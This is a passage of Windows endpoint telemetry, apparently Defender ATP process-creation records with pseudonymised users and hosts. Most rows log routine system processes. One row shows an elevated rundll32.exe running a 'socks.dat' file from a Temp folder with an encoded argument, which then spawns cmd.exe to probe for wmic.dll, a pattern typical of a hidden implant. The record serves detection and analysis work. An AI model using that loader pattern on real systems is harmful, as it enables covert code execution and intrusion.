01:07:20.615311900+00:00,b0772347-0dd1-42a5-b847-0e9561764944,computerpii_0a470890c60768167990033d701e7bd881398861,156295,False,10.7740.19041.1052,False,11540474045136925,,11540474045172111,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client
+234,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:05:41.375307700+00:00,3832,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:05:41.366437500+00:00,3768,dmclient.exe,dmclient.exe utcwnf,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:05:41.634407100+00:00,2021-06-23 01:07:20.615347800+00:00,7caeac8c-d497-4f1c-9277-d8ef4c48c972,computerpii_0a470890c60768167990033d701e7bd881398861,156296,False,10.7740.19041.1052,False,11540474045172111,,11540474045172112,2021-06-23 01:05:41.366437500+00:00,3768,2021-06-23 01:05:41.366437500+00:00,\Device\HarddiskVolume3\Windows\System32\dmclient.exe,3768,18560,TerminateProcessStartkey,C:\Windows\System32,121344,2083-12-25 18:01:52+00:00,2021-02-17 04:34:43.549079100+00:00,2021-06-23 01:00:55.400928200+00:00,2021-02-17 04:34:43.547067+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+235,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:06:32.017201200+00:00,1656,SDXHelper.exe,"""sdxhelper.exe"" /onlogon",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:06:32.124299500+00:00,2021-06-23 01:07:20.616015700+00:00,9f77bdd0-7ec9-4d6a-bb92-689500686836,computerpii_0a470890c60768167990033d701e7bd881398861,156312,False,10.7740.19041.1052,False,11540474045136925,,11540474045172116,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+236,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:06:48.747961+00:00,20048,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:06:49.514413600+00:00,2021-06-23 01:07:20.616426800+00:00,9731050d-8cf7-467d-ae80-3264856dd41f,computerpii_0a470890c60768167990033d701e7bd881398861,156321,False,10.7740.19041.1052,False,11540474045171833,,11540474045172118,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+237,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:27:56.700927500+00:00,15572,cmd.exe,"""cmd.exe"" /c ""dir C:\Windows\System32\wmic.dll""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:27:57.433376200+00:00,2021-06-23 03:28:59.537082800+00:00,724b25ef-43d7-48eb-be14-0d028b20b206,computerpii_0a470890c60768167990033d701e7bd881398861,161790,True,10.7740.19041.1052,False,11540474045173046,,11540474045173143,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+238,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 05:01:00.839461200+00:00,9612,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xb3dc2055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 05:01:00.944477+00:00,2021-06-24 05:55:44.945889800+00:00,5b0aefd5-008f-4f4f-9c39-77da0ed24046,computerpii_0a470890c60768167990033d701e7bd881398861,175939,False,10.7740.19041.1052,False,11540474045175072,,11540474045176721,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+239,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 05:16:29.078336800+00:00,548,DPM.exe,"""DPM.exe"" -LaunchAsHelper -LogFileName=DPM-Helper -SystemContext",PortableExecutable,2021-05-18 18:40:12+00:00,C:\Program Files\Dell\Dell Peripheral Manager\DPM.exe,15820280,9f5e0af77515966211006ba1faf992cf,71a938dcd7832b8a7b6cd67554f83a90b81bdcef98e1362af86a2344b412a642,af168dfd85d18d03083464e5d6112c00d2bacdea,97afe1b8859c5e7862a7ca6c971c74df,fa5314e93650999193c4eee122b6482f921d2d30db88f16ce39032f03b733af4,d7c795b55dbf276f91a9f28df6cc8562b467535b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-15 01:05:19.778381100+00:00,11792,DPMService.exe,"""DPMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 05:16:29.916684+00:00,2021-06-24 05:55:44.946298400+00:00,9154c399-f602-4b53-ab16-7076d8e083bd,computerpii_0a470890c60768167990033d701e7bd881398861,175950,False,10.7740.19041.1052,False,11540474045147970,,11540474045176729,2021-06-15 01:05:19.778381100+00:00,11792,2021-06-15 01:05:19.778381100+00:00,\Device\HarddiskVolume3\Program Files\Dell\Dell Peripheral Manager\DPMService.exe,11792,128,ActiveProcessStartkey,C:\Program Files\Dell\Dell Peripheral Manager,1688056,2021-05-18 18:32:07+00:00,2021-05-18 18:40:14+00:00,2021-06-15 01:05:12.297854100+00:00,2021-05-18 18:40:14+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Dell Inc.,Dell Peripheral Manager,1.4.0,DPMService.exe,DPMService.exe,Dell Peripheral Manager Service,Dell Inc.,Dell Peripheral Manager,1.4.0,DPM.exe,DPM.exe,Dell Peripheral Manager Application
+240,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:04:04.601541500+00:00,15568,SenseCncProxy.exe,4928,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:05.497194300+00:00,2021-06-24 01:11:17.331477800+00:00,01723218-e95d-43b8-a55b-24ff1b449279,computerpii_0a470890c60768167990033d701e7bd881398861,170118,False,10.7740.19041.1052,False,11540474045137006,,11540474045175498,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+241,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:04:08.250811900+00:00,15164,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xac6f6855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:08.407309200+00:00,2021-06-24 01:11:17.331632600+00:00,d90745de-c60e-47f9-b9ed-9fd40848b3ac,computerpii_0a470890c60768167990033d701e7bd881398861,170120,False,10.7740.19041.1052,False,11540474045175072,,11540474045175499,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+242,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:04:08.431963200+00:00,13684,LockApp.exe,"""LockApp.exe"" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca",PortableExecutable,2021-03-11 01:06:58.463741900+00:00,C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe,3596624,82ec40c983294188d3f48189a764af98,38c35262feae1964a324cd17cfb6053afaa025faf591f3dbb34d3d518d6d2cc5,fa53852b8b0f8feb393f3e22b2ec52699016a599,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:08.498222300+00:00,2021-06-24 01:11:17.331710100+00:00,7aacc47a-654b-4e0f-a32f-c83709e74bf8,computerpii_0a470890c60768167990033d701e7bd881398861,170121,False,10.7740.19041.1052,False,11540474045136908,,11540474045175500,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,LockApp.exe,LockApp.exe,LockApp.exe
+243,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:04:09.181937700+00:00,8144,DeviceCensus.exe,devicecensus.exe UserCxt,PortableExecutable,2021-04-14 01:10:18.913311800+00:00,C:\Windows\System32\DeviceCensus.exe,57672,e4e45a9e9e546c9553820b2d876a3ba3,787babc5276737f5f0d1063300883d3381c57a344cc787deb16badaab6d04dd7,9914f5914c02add1d3590844a628b3c5a5fa2c48,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:09.671324200+00:00,2021-06-24 01:11:17.332095200+00:00,0d16198a-483f-42b9-8c84-120d7d60c087,computerpii_0a470890c60768167990033d701e7bd881398861,170129,False,10.7740.19041.1052,False,11540474045136925,,11540474045175503,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,DeviceCensus,DeviceCensus.exe,Device Census
+244,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:04:20.588710400+00:00,20260,SenseCncProxy.exe,4608,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:21.227278400+00:00,2021-06-24 01:11:17.332328500+00:00,571edbd6-5061-4dfb-9d59-787bb15244ff,computerpii_0a470890c60768167990033d701e7bd881398861,170134,False,10.7740.19041.1052,False,11540474045137006,,11540474045175505,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+245,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:04:21.467647300+00:00,20396,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""3568"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:04:22.245139300+00:00,2021-06-24 01:11:17.332403400+00:00,ceb85e3b-c8a4-4622-a103-e2b2ec794701,computerpii_0a470890c60768167990033d701e7bd881398861,170136,False,10.7740.19041.1052,False,11540474045137006,,11540474045175506,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
